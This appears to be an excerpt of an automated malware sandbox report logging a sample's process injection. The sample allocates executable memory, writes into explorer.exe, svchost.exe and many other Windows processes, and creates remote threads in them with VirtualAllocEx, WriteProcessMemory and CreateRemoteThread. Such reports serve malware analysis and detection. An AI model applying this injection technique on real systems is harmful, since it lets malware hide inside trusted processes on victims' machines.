            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1020000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1050000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: FC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 4B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 990000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: B80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 9D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1480000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1020000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1120000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 460000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: CA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: DB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 13D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 930000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: D80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 28A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 25C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 790000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 28B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: C70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 14D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 28E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: C60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: F10000 protect: page execute and read and writeJump to behavior
            Contains functionality to inject threads in other processes
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_047E0DE0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,2_2_047E0DE0
            Source: C:\Windows\explorer.exeCode function: 3_2_01391F8D VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,3_2_01391F8D
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 13908B3Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\sihost.exe EIP: AC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 91090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 9A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ctfmon.exe EIP: A5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 345090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: D4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe EIP: B5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 11090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe EIP: A9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: AB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\smartscreen.exe EIP: 29090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe EIP: 58090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 90090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ApplicationFrameHost.exe EIP: 18090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe EIP: A1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 19090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\ImmersiveControlPanel\SystemSettings.exe EIP: F1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\oobe\UserOOBEBroker.exe EIP: 1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 9F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\conhost.exe EIP: 88090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\dllhost.exe EIP: 98090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\backgroundTaskHost.exe EIP: C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: A2090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 6090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 307090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 2CE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 64090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 6D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 2EF090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 147090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 116090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 1FF090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 263090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe EIP: 81090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2CF090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 13C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 87090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 221090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: C3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 25E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2AB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 241090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 13E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2DF090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 115090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: D2090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 250090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 152090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2EB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 29A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 275090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 29D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 15B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 66090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 103090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2AF090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 303090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 12F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 10E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: DD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 118090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 29B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 24C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 9D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 94090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FF090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2D9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 12A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 102090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 105090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 4B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 99090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B8090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 19090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 9D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 148090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 102090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 112090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 46090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: CA090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: DB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 13D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2DC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 93090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: D8090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 28A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 25C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 79090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 28B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: C7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E0090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 14D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 28E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2BE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: C6090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F1090BJump to behavior
            Source: C:\Windows\explorer.exeThread created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe EIP: 1C090BJump to behavior
            Source: C:\Windows\explorer.exeThread created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe EIP: 1C090BJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\SysWOW64\winver.exeMemory written: PID: 2580 base: 1390000 value: 50Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: PID: 2580 base: 3450000 value: 50Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\java.exeMemory written: C:\Windows\SysWOW64\winver.exe base: D018B0Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\explorer.exe base: 1390000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\sihost.exe base: AC0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 910000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 9A0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\ctfmon.exe base: A50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\explorer.exe base: 3450000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: D40000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 110000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\smartscreen.exe base: 290000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 900000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 190000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\svchost.exe base: 9F0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\conhost.exe base: 880000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\dllhost.exe base: 980000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A20000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 60000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 3070000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2CE0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 640000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 6D0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2EF0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1470000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1160000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1FF0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2630000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 810000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2CF0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 13C0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 870000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2210000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: C30000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 25E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2AB0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2410000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 13E0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2DF0000Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory written: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1150000Jump to behavior
